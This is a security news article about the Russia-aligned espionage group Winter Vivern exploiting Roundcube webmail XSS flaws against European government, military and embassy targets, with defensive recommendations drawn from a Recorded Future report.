Russian APT 'Winter Vivern' Targets European Government, Military

We Keep you Connected

Russian APT 'Winter Vivern' Targets European Government, Military

TAG-70’s sophisticated espionage campaign targeted a range of geopolitical targets, suggesting a highly capable and well-funded state-backed threat actor.
February 17, 2024
The Russia-aligned threat group known as Winter Vivern was discovered exploiting cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers across Europe in October — and now its victims are coming to light.
The group mainly targeted government, military, and national infrastructure in Georgia, Poland, and Ukraine, according to Recorded Future's Insikt Group report on the campaign released today.
The report also highlighted additional targets, including the Embassy of Iran in Moscow, the Embassy of Iran in the Netherlands, and the Embassy of Georgia in Sweden.
Utilizing sophisticated social engineering techniques, the APT (which Insikt calls TAG-70 and which is also known as TA473, and UAC-0114) used a Roundcube zero-day exploit to gain unauthorized access to targeted mail servers across at least 80 separate organizations, ranging from the transport and education sectors to chemical and biological research organizations.
The campaign is thought to have been deployed to gather intelligence on European political and military affairs, potentially to gain strategic advantages or undermine European security and alliances, according to Insikt.
The group is suspected of conducting cyber-espionage campaigns serving the interests of Belarus and Russia, and has been active since at least December 2020.
The October campaign was linked to TAG-70's previous activity against Uzbekistan government mail servers, reported by Insikt Group in February 2023.
An obvious motivation for the Ukrainian targeting is the conflict with Russia.
"In the context of the ongoing war in Ukraine, compromised email servers may expose sensitive information regarding Ukraine's war effort and planning, its relationships, and negotiations with its partner countries as it seeks additional military and economic assistance, [which] expose third parties cooperating with the Ukrainian government privately, and reveal fissures within the coalition supporting Ukraine," the Insikt report noted.
Meanwhile, the focus on Iranian embassies in Russia and the Netherlands could be tied to a motive to evaluate Iran's ongoing diplomatic engagements and foreign policy positions, particularly considering Iran's involvement in supporting Russia in the conflict in Ukraine.
Similarly, the espionage targeting the Georgian Embassy in Sweden and the Georgian Ministry of Defense probably stems from comparable foreign policy-driven objectives, especially as Georgia has revitalized its pursuit of European Union membership and NATO accession in the aftermath of Russia's incursion into Ukraine in early 2022.
Other notable targets included organizations involved in the logistics and transportation industries, which is telling based on the context of the war in Ukraine, as robust logistics networks have proved crucial for both sides in maintaining their ability to fight.
Cyber-espionage campaigns have been ramping up: Earlier this month, a sophisticated Russian APT launched a targeted PowerShell attack campaign against the Ukrainian military, while another Russian APT, Turla, targeted Polish NGOs using a novel backdoor malware.
Ukraine has also launched its own cyberattacks against Russia, targeting the servers of Moscow Internet service provider M9 Telecom in January, in retaliation for the Russia-backed breach of Kyivstar mobile phone operator.
But the Insikt Group report noted that defending against attacks like these can be difficult, especially in the case of zero-day vulnerability exploitation.
However, organizations can mitigate the impact of compromise by encrypting emails and considering alternative forms of secure communications for the transmission of particularly sensitive information.
It's also crucial to ensure that all servers and software are patched and kept up-to-date, and users should only open emails from trusted contacts.
Organizations should also limit the amount of sensitive information stored on mail servers by practicing good hygiene and reducing data retention and restrict sensitive information and conversations to more secure high-side systems whenever possible.
The report also noted that responsible disclosure of vulnerabilities, particularly those exploited by APT actors such as TAG-70, is crucial for several reasons.
A threat intelligence analyst at Recorded Future's Insikt Group explained via email this approach ensures vulnerabilities are patched and rectified quickly before others discover and abuse them, and enables containment of exploits by sophisticated attackers, preventing broader and more rapid harm.
"Ultimately, this approach addresses the immediate risks and encourages long-term improvements in global cybersecurity practices," the analyst explained.
Nathan Eddy, Contributing Writer

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.
You May Also Like
Making Sense of Security Operations Data
Making Sense of Security Operations Data
Unbiased Testing. Unbeatable Results
Unbiased Testing. Unbeatable Results
Your Everywhere Security guide: Four steps to stop cyberattacks
Cybersecurity’s Hottest New Technologies – Dark Reading March 21 Event
Black Hat Asia – April 16-19 – Learn More
Black Hat Spring Trainings – March 12-15 – Learn More
Industrial Networks in the Age of Digitalization
Zero-Trust Adoption Driven by Data Protection
How Enterprises Assess Their Cyber-Risk
The State of Supply Chain Threats
How to Deploy Zero Trust for Remote Workforce Security
FortiSASE Customer Success Stories – The Benefits of Single Vendor SASE
2023 Gartner Magic Quadrant for Single-Vendor SASE
Zero Trust Access For Dummies, 2nd Fortinet Special Edition
Mandiant Threat Intelligence at Penn State Health
Understanding AI Models to Future-Proof Your AppSec Program
Cybersecurity’s Hottest New Technologies – Dark Reading March 21 Event
Black Hat Asia – April 16-19 – Learn More
Black Hat Spring Trainings – March 12-15 – Learn More
Copyright © 2024 Informa PLC Informa UK Limited is a company registered in England and Wales with company number 1072954 whose registered office is 5 Howick Place, London, SW1P 1WG.